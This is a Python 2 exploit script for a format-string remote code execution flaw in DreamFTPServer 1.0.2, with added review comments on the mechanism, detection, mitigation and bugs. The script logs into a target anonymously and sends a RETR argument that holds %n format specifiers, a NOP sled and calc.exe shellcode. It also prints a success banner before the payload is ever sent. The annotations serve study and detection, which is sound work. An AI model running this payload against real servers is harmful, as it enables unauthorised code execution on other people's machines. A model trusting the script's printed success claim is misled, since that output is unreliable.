
import socket
import os
import sys

# NOTE(review): Python 2 source (print statements, raw_input); it does not run
# unmodified on Python 3. `os` and `sys` are imported but never used below.

# Author banner, printed verbatim (it is a string literal, not comments).
print '''

##############################################
# Created: ScrR1pTK1dd13 #
# Name: Greg Priest #
# Mail: ScrR1pTK1dd13.slammer@gmail.com #
##############################################

# Exploit Title: DreamFTPServer1.0.2_RETR_command_format_string_remotecodevuln
# Date: 2016.11.04
# Exploit Author: Greg Priest
# Version: DreamFTPServer1.0.2
# Tested on: Windows7 x64 HUN/ENG Professional
'''

# Target host is read interactively; the control channel is the standard FTP
# port 21.
ip = raw_input("Target ip: ")
port = 21

# Format-string payload. The '%8x' conversions consume stack slots, and each
# '%n' stores the count of characters printed so far through a pointer taken
# from the stack -- that is the primitive that turns an attacker-controlled
# format string into a memory write. The very large field widths
# (e.g. %341901071x) exist only to drive that count to a chosen value.
# Root cause on the server side: the RETR argument is passed to a printf-style
# function as the format string instead of as a '%s' argument.
# Detection: '%n' (or long runs of '%x') inside an FTP command argument has no
# legitimate use and is a high-confidence signal in FTP logs or IDS rules.
overflow = '%8x%8x%8x%8x%8x%8x%8x%8x%341901071x%n%8x%8x%24954x%n%x%x%x%n'
# 25-byte NOP sled (0x90) placed between the format string and the shellcode.
nop = '\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90'
#overflow = '%8x%8x%8x%8x%8x%8x%8x%8x%341901090x%n%8x%8x%24954x%n%x%x%x%n\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90'

#shellcode calc.exe
# Proof-of-concept payload per the author's label; the bytes 0x63 0x61 0x6c
# 0x63 ("calc") are pushed near the end. On a defended host, an FTP service
# process spawning calc.exe (or any child process) is the host-side indicator.
shellcode =(
"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f" +
"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b" +
"\x77\x20\x8b\x3f\x80\x7e\x0c\x33" +
"\x75\xf2\x89\xc7\x03\x78\x3c\x8b" +
"\x57\x78\x01\xc2\x8b\x7a\x20\x01" +
"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6" +
"\x45\x81\x3e\x43\x72\x65\x61\x75" +
"\xf2\x81\x7e\x08\x6f\x63\x65\x73" +
"\x75\xe9\x8b\x7a\x24\x01\xc7\x66" +
"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7" +
"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9" +
"\xb1\xff\x53\xe2\xfd\x68\x63\x61" +
"\x6c\x63\x89\xe2\x52\x52\x53\x53" +
"\x53\x53\x53\x53\x52\x53\xff\xd7")

# Full RETR argument: format string, sled, shellcode, CRLF terminator.
remotecode = overflow + nop + shellcode + '\r\n'

# Plain TCP control connection; no timeout is set, so a silent target blocks
# every recv() below indefinitely.
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
# socket.connect() returns None; `connect` is never read.
connect=s.connect((ip ,port))
# Each recv() discards whatever the server answered; replies are never checked.
s.recv(1024)
# Anonymous login. Mitigation on the server side: disable anonymous access
# (and patch/upgrade), since the vulnerable RETR handler is reached after
# authentication.
s.send('USER anonymous\r\n')
s.recv(1024)
# NOTE(review): the verb sent here is 'PASSW', not the FTP 'PASS' command;
# whether the server treats it as a password step cannot be told from here.
# In any case the observable pattern for a defender is: anonymous login
# followed by a RETR whose argument contains '%n'.
s.send('PASSW hacker@hacker.net\r\n')
s.recv(1024)
# The payload and the "success" banner are printed BEFORE the RETR is sent,
# so this output is not evidence of anything happening on the target.
print remotecode
print '''
Successfull Exploitation!
'''
# The format string is delivered as the RETR argument.
message = 'RETR ' + remotecode
s.send(message)
s.recv(1024)
# NOTE(review): `s.close` without parentheses only references the bound
# method; the socket is not explicitly closed and is released at exit.
s.close